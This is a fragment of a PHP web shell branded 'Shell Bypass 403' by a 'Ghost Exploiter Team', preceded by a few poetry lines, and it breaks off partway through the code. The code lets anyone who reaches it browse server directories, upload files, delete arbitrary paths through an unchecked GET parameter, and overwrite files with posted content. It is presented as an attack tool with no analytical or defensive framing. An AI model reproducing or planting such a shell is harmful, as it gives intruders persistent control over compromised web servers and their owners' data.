Weak hands cannot be planted, meager skills have no foundation. Shallow wisdom is futile, how can one hope for a good name?扰扰从役倦,屑屑身事微。少壮轻年月,迟暮惜光辉。
Shell Bypass 403 GE-C666C
Ghost Exploiter Team Official
$value) {
if ($value == "" && $key == 0){
echo '
/'; continue;
} echo '
'.$value.'/';
}
if (isset($_POST['submit'])){
$namafile = $_FILES['upload']['name'];
$tempatfile = $_FILES['upload']['tmp_name'];
$tempat = $_GET['dir'];
$error = $_FILES['upload']['error'];
$ukuranfile = $_FILES['upload']['size'];
move_uploaded_file($tempatfile, $dir.'/'.$namafile);
echo "
";
}
?>
| Nama File / Folder |
Size |
Action |
'.$directory.' |
-- |
NONE |
';
}
foreach ($scan as $file) {
if (!is_file($dir.'/'.$file)) continue;
$jumlah = filesize($dir.'/'.$file)/1024;
$jumlah = round($jumlah, 3);
if ($jumlah >= 1024) {
$jumlah = round($jumlah/1024, 2).'MB';
} else {
$jumlah = $jumlah .'KB';
}
echo '
| '.$file.' |
'.$jumlah.' |
Delete
Edit
Rename
|
';
}
if (isset($_GET['open'])) {
echo '
';
}
if (isset($_GET['delete'])) {
if (unlink($_GET['delete'])) {
echo "";
}
}
if (isset($_GET['ubah'])) {
echo '
<=Back
';
}
if (isset($_POST['edit'])) {
$data = fopen($_POST["object"], 'w');
if (fwrite($data, $_POST['edit'])) {
echo
'
';
} else {
echo "
";
}
}
if($_GET['rename']){
if(isset($_PO